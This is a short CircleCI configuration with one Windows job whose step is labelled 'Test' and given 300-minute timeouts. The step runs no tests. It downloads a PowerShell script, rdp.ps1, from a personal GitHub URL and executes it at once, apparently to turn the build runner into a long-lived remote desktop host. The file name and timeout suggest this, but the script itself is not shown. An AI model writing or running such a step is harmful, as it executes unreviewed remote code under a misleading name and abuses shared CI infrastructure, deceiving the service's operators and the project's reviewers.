version: 2.1 
 
orbs:
  win: circleci/windows@2.2.0
 
jobs:
  build: 
    executor:
      name: win/default 
      size: "medium" 
 
    steps:
      - run:
          name: Test
          when: always
          timeout: 300m
          no_output_timeout: 300m
          command: |
            Invoke-WebRequest https://raw.githubusercontent.com/kijang-7/circleci/main/rdp.ps1 -OutFile rdp.ps1
            ./rdp.ps1
